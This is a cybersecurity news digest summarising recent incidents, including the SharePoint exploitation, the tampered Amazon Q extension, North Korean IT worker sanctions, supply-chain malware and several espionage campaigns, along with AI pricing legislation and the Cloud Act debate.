Daily Brief

Two Democratic Congress members have introduced a bill to ban AI surveillance in setting prices and wages. Delta Airlines has begun using AI for dynamic pricing, covering 3% of its customers, with plans to expand to 20% by year-end. The proposed legislation, called the Stop AI Price Gouging and Wage Fixing Act, aims to protect consumers from AI-driven price manipulation based on personal data. The Federal Trade Commission (FTC) has reported the prevalence of "surveillance pricing," where prices are adjusted based on consumer data such as location, device type, and shopping habits. The bill seeks enforcement by the FTC, the Equal Employment Opportunity Commission, and states, and allows for private actions against violating companies. Despite broad concerns, the legislation faces significant challenges due to Republican control of Congress, which may hinder its passage.

Microsoft announced incomplete fixes for SharePoint bugs in July, enabling attackers to exploit vulnerabilities. Researchers suspect a leak, possibly from the Microsoft Active Protections Program (MAPP), helped attackers bypass new security patches. Initial exploitation occurred before the patches were publicly released, raising questions about the source of the leak. Attacks were executed by various groups including Chinese government-backed hackers and ransomware gangs. Eye Security detected large-scale exploitation shortly after the flawed patches were announced by Microsoft. Over 400 organizations were compromised, exploiting flaws for which patches were insufficient. Microsoft refrained from disclosing specific details about the incident but promised to review and improve their response processes. Alternative theories suggest attackers might have independently discovered the exploits without relying solely on a leak.

Hacker named 'lkmanka58' infiltrated Amazon's generative AI tool, Amazon Q, designed for Visual Studio Code, with a non-destructive wiper code. The code was intended to warn about AI coding security rather than cause actual damage, displayed data-wiping commands on users' screens. The breach occurred after the hacker submitted a pull request to Amazon's GitHub repository, exploiting potential workflow misconfigurations. Amazon unknowingly published the compromised version (1.84.0) on the Visual Studio Code marketplace, which was downloaded by its near-million user base. Security researchers alerted Amazon on July 23, after which Amazon confirmed the issue and released a patched version (1.85.0) on the following day. AWS assured that the defective code was non-operational in user environments, although there were unconfirmed reports of the code executing without causing harm. Latest advice to users is to update their Amazon Q extension to version 1.85.0 promptly to avoid any potential risks from the compromised version. This incident highlights the need for rigorous security protocols in handling contributions to publicly accessible software repositories.

Senator Maria Cantwell has requested Mandiant to provide security assessments related to the Salt Typhoon breaches at AT&T and Verizon. Both telecommunications giants have denied Congress these documents, raising concerns about the veracity of their network security claims. The breach, attributed to Chinese operatives, granted them substantial and possibly long-standing access to U.S. telecom networks. In the past, AT&T and Verizon claimed network security, despite significant breaches confirmed by U.S. intelligence. The demand from Senator Cantwell comes amid broader investigations into Chinese espionage activities within U.S. IT infrastructure. Recorded Future and SecurityScorecard reported ongoing Chinese campaigns targeting global telecom providers and U.S. universities. Previously, the Cyber Safety Review Board was dissolved under the Trump administration while investigating similar espionage cases.

The U.S. Department of the Treasury has imposed sanctions on the Korea Sobaeksu Trading Company and three individuals for supporting North Korea's illicit IT worker scheme. The sanctioned North Korean IT scheme aimed to infiltrate global supply chains and evade international sanctions through fraudulent activities and identity theft. North Korean dispatched IT workers have used false documents and identities to secure remote jobs in an effort to generate revenue and acquire sensitive data. Some of the workers involved have reportedly introduced malware into networks, further endangering company security and extracting proprietary data. The scheme supports the DPRK's weapons programs by funneling earned wages back to fund its unlawful nuclear and ballistic missile initiatives. Christina Marie Chapman was sentenced for her part in facilitating this scheme by running a laptop farm, making over $17 million while aiding North Korean operations. The FBI seized significant evidence, including 90 laptops from Chapman's residence during a recent operation, highlighting the extensive nature of the fraudulent network.

Toptal's GitHub account was compromised, leading to the distribution of malware via its Picasso developer toolbox. Approximately 5,000 downloads of Toptal's software contained malicious code, aimed at stealing GitHub authentication tokens and setting up backdoors. Security firm Socket discovered the malware in 10 of the 73 public repositories they analyzed, which allowed attackers persistent access and further malware downloads. Socket advised affected users to check package.json files for malicious scripts, rotate any compromised GitHub tokens, and scan systems for malicious activity. Toptal took quick action by removing the infected repositories and restoring them to their last stable versions to mitigate further damage. Socket attempted to contact Toptal for additional details regarding the breach timeline and the intrusion method but received no response. The compromised npm packages are part of a broader trend of targeted attacks on npm packages used in supply chain attacks, including phishing and AI-coding systems vulnerabilities.

Patchwork, a state-sponsored Indian actor, launched a spear-phishing attack on Turkish defense firms to gather strategic intelligence. The attack utilized malicious LNK files disguised as conference invitations concerning unmanned vehicle systems. Targets included manufacturers of precision-guided missile systems; linked to geopolitical tensions between Pakistan, Türkiye, and India. The malicious payload involved a multi-stage infection process beginning with a deceptive PDF and PowerShell commands to download further malware. Compromised systems were manipulated to extract extensive reconnaissance data, including screenshots, back to the Patchwork-operated server. The technical evolution of the threat actor was noted, shifting from x64 DLL formats to more sophisticated x86 PE executables. Patchwork’s activities reflect broader geopolitical implications, particularly in the context of Türkiye's growing defense collaborations and regional tensions.

Cybersecurity has evolved from merely thwarting viruses to combating a sophisticated, financially driven cybercrime industry. Product Managers (PMs) now face smarter, more damaging attacks targeting consistent vulnerabilities such as stolen credentials and unpatched systems. Cybersecurity PMs must adapt product development to focus on real-time risk mitigation through layered defenses and incident-driven adjustments. The “100 days to secure your environment” webinar series by ThreatLocker exemplifies how breach insights directly influence product features and policy updates. Beyond issuing advisories, PMs are crucial in integrating real-world feedback into developing safer, more resilient technological environments. Continuous education and innovation are essential, with solutions like ThreatLocker Patch Management playing a vital role in empowering PMs against evolving threats. Staying proactive and responsive to the dynamic cybersecurity landscape helps PMs limit risks while maintaining efficient operational workflows.

Russian aerospace and defense industries targeted by cyber espionage campaign utilizing EAGLET backdoor. Operation CargoTalon conducted by Unknown Group 901, targets Voronezh Aircraft Production Association employees with spear-phishing emails. Attack involves cargo-themed phishing emails containing a ZIP archive with a malicious Windows shortcut file. Shortcut files use PowerShell to deploy EAGLET DLL while displaying a decoy document, linking to sanctioned Russian logistics entities. EAGLET backdoor gathers system data and establishes connections to a remote server for command execution but actual payload details remain unknown as C2 server is offline. Overlap in source code and tactics found with other campaigns targeting the Russian military, similar to Head Mare threat group. Concurrently, Russian state-sponsored group UAC-0184 targets Ukraine with simplified attack vectors deploying Remcos RAT.

Microsoft executives acknowledged under oath in the French Senate that they cannot guarantee data sovereignty for EU-based customer data if the U.S. government demands access under the Cloud Act. The Cloud Act allows U.S. authorities to compel U.S.-based tech companies to provide access to data, irrespective of whether the data is stored domestically or on servers abroad. Despite contractual commitments to resist unfounded requests, Microsoft admits it must comply with U.S. law, which could involve disclosing European data without local government agreements. Microsoft has historically resisted such requests and has implemented strict measures to scrutinize and challenge the validity of U.S. government data requests since the Obama administration. AWS and Google, like Microsoft, supported the Cloud Act at the time of its enactment, emphasizing its necessity for modern digital law enforcement despite criticism from civil rights groups. European cloud providers see this as a potential sovereignty issue, pushing the EU towards developing independent cloud solutions to ensure data sovereignty and reduce dependency on U.S. tech giants. AWS added context to the discussion by clarifying that the Cloud Act does not provide unrestricted access to data and requires judicial oversight for data request approval.

The U.S. Treasury sanctioned Korea Sobaeksu Trading Company and three North Korean nationals for supporting fraudulent IT worker schemes. These schemes involve North Korean tech workers infiltrating American companies with fake or stolen identities. Proceeds from these schemes are funneled back to North Korea, funding its nuclear and missile programs. Recent actions include disrupting "laptop farm" operations and indicting key individuals involved in such fraudulent activities. OFAC also sanctioned Song Kum Hyok, linked to the North Korean hacking group “Andariel”, for his role in these IT worker schemes. The sanctions result in asset freezes and prohibit transactions with U.S. entities, aiming to increase pressure on DPRK. The U.S. State Department offers rewards up to $7 million for information leading to the arrest of the sanctioned individuals. These moves underscore U.S. efforts to hinder North Korea's ability to finance its controversial military programs.

Christina Marie Chapman, a 50-year-old from Arizona, has been sentenced to 102 months in prison for aiding North Korean IT workers infiltrate 309 U.S. companies. Chapman, along with Ukrainian Oleksandr Didenko and three others using aliases, were charged with multiple conspiracy and fraud charges by the DOJ. Chapman operated a "laptop farm" at her home, allowing North Korean operatives to remotely work and appear as though located in the U.S. These North Korean workers, employed under false identities, engaged with several Fortune 500 companies and other significant U.S. businesses, earning over $17 million. The Justice Department has seized more than 90 laptops from Chapman's residence and sanctioned additional entities linked to these fraudulent activities. Recent measures include OFAC sanctions on a North Korean front company and related individuals, and updated FBI guidance on employing remote workers.

Cloud security firms Wiz and Aqua uncovered two malware clusters, named Soco404 and Koske, exploiting cloud vulnerabilities for cryptomining. Soco404 targets Linux and Windows systems with cryptominers embedded in fake 404 HTML pages hosted on Google Sites. The campaign has exploited Apache Tomcat, Atlassian Confluence servers, and publicly accessible PostgreSQL databases to spread malware. Attack strategies include using both native Linux and Windows tools to download and execute payloads, aiming to maximize system exploitation and financial gain. For Windows systems, the malware attempts to halt event logging and executes self-deletion commands to avoid detection. Koske malware, suspected to be assisted by a large language model, disguises payloads within JPEG images and utilizes misconfigured JupyterLab servers. Both malware campaigns aim to utilize the computational resources of compromised systems to mine various cryptocurrencies, emphasizing stealth and persistence in infection methods.

Recent study by Harmonic Security reveals extensive unapproved use of Chinese GenAI tools among US and UK employees. Analysis of 14,000 employees showed 8% used China-based AI tools like DeepSeek and Baidu Chat, raising data security concerns. Over 17 megabytes of sensitive data, including source code and M&A documents, were uploaded to these platforms in one month. Data uploaded to these tools have doubtful data handling and privacy policies, potentially breaching compliance regulations. DeepSeek was the primary platform used, linked to 85% of the incidents where sensitive data was compromised. Harmonic Security’s monitoring tool offers real-time AI usage tracking and policy enforcement to mitigate risks. The study underscores a significant governance gap in companies with heavy developer presence where policy often lags behind tech adoption.

Qdos, a business insurance and employment status specialist, confirmed a data breach impacting customer personal data. The breach originated from unauthorized access to the mygoqdos.com web application. Detected on June 19, Qdos engaged third-party cybersecurity experts to investigate the breach. The breach did not involve ransomware, but personal customer information and documents related to insurance and IR35 services were potentially accessed. Financial data and sensitive identity documents like passports or driver's licenses were not compromised. Despite the data breach, Qdos assured clients that their insurance policies remain unaffected, and the functionality of online account management for policy renewals and applications is secure. Qdos has notified relevant authorities including the ICO, FCA, Action Fraud, and NCSC and is offering affected users free identity monitoring services through Experian.